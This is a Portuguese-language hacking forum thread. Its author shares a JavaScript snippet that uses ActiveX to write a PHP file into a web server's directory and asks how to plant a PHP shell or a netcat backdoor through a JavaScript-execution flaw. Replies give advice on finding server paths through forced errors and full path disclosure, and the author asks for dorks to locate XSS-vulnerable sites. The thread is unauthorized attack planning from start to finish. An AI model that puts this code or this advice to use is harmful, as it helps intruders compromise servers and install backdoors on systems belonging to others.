Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

[Ajuda] Ataque via javascript Criar shell ou instalar Backdoor netcat via activex

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    [Ajuda] Ataque via javascript Criar shell ou instalar Backdoor netcat via activex

    Ola pessoal,
    estou tentando explorar uma falha que permite execução de JavaScript,
    como JavaScript não permite upload, então tive a ideia de usar o ActiveX junto com o IE
    com esse script é possível criar um novo arquivo dentro do servidor.

    1 Problema

    eu preciso saber o endereço físico do servidor para criar o arquivo no diretório do site.
    é possivel descobrir esse endereço fisico do servidor?
    exemplo
    D:server/publichtml/www/site/imagens

    Segunda ideia, instalar backdoor no servidor.
    não sei como proceder nessa segunda ideia talvez de para criar e instalar o netcat via JavaScript

    segue o script

    Código:
    <script>

function WriteFile(){
try 
	{ 
   var fso  = new ActiveXObject("Scripting.FileSystemObject");
   
  
 
   //Observe que sera criado um arquivo com a extensão php 
   var fh = fso.CreateTextFile("\\Arquivos de programas\\VertrigoServ\\www\\lerjs\\topics.php", false);
   fh.WriteLine("Conteudo do arquivo");
   fh.Close();
   
	}

catch(err){
var strErr = 'Error:';
strErr += '\nNumber:' + err.number;
strErr += '\nDescription:' + err.description;
document.write(strErr);
}
}

//chamada da função
 WriteFile();

</script>

    OBS:
    para rodar é necessário do Internet Explorer, ActiveX e habilitar os modos do activex no IE para que possa rodar corretamente o script.

    qualquer informação é de grande ajuda.
    obrigado.
    Tags: Nenhum(a)
    • Top
  • Font Size
    #2
    Eu não entendi bem o que vc está tentando fazer, porém a raiz é possível de ser pega sim na maioria das vezes, tente gerar algum erro em alguma URL do site ou então vasculhar o código fonte das páginas principais, ou se o site for hospedado em um servidor compartilhado vc pode conseguir isso através de outro site do mesmo servidor.
    • Top

    Comment

    • Font Size
      #3
      Estou tentando criar uma shell em php usando o activex.
      mas pra isso eu preciso do diretorio fisico do servidor.

      a segunda ideia seria criar um exe no desktop e depois executar automaticamente, abrindo as portas do server para o ataque.
      • Top

      Comment

      • Font Size
        #4
        Tem algum dork ou alguma ferramenta para achar sites vull a xss, vou tentar em outros sites, e vou seguir a dica forçar um erro na aplicação para achar o diretório físico
        • Top

        Comment

        • Font Size
          #5
          Postado Originalmente por leanhils Ver Post
          Ola pessoal,
          estou tentando explorar uma falha que permite execução de JavaScript,
          como JavaScript não permite upload, então tive a ideia de usar o ActiveX junto com o IE
          com esse script é possível criar um novo arquivo dentro do servidor.

          1 Problema

          eu preciso saber o endereço físico do servidor para criar o arquivo no diretório do site.
          é possivel descobrir esse endereço fisico do servidor?
          exemplo
          D:server/publichtml/www/site/imagens

          Segunda ideia, instalar backdoor no servidor.
          não sei como proceder nessa segunda ideia talvez de para criar e instalar o netcat via JavaScript

          segue o script

          Código:
          <script>

function WriteFile(){
try 
	{ 
   var fso  = new ActiveXObject("Scripting.FileSystemObject");
   
  
 
   //Observe que sera criado um arquivo com a extensão php 
   var fh = fso.CreateTextFile("\\Arquivos de programas\\VertrigoServ\\www\\lerjs\\topics.php", false);
   fh.WriteLine("Conteudo do arquivo");
   fh.Close();
   
	}

catch(err){
var strErr = 'Error:';
strErr += '\nNumber:' + err.number;
strErr += '\nDescription:' + err.description;
document.write(strErr);
}
}

//chamada da função
 WriteFile();

</script>

          OBS:
          para rodar é necessário do Internet Explorer, ActiveX e habilitar os modos do activex no IE para que possa rodar corretamente o script.

          qualquer informação é de grande ajuda.
          obrigado.
          Veja se você não consegue achar um full path disclosure, fica mais fácil fazer a identificação de diretórios.
          Yes, I am a criminal. My crime is that of curiosity. My crime is
          that of judging people by what they say and think, not what they look like.
          My crime is that of outsmarting you, something that you will never forgive me
          for.

          I am a hacker, and this is my manifesto. You may stop this individual,
          but you can't stop us all... after all, we're all alike.
          • Top

          Comment

          Anterior template Avançar
          X
          Working...
          X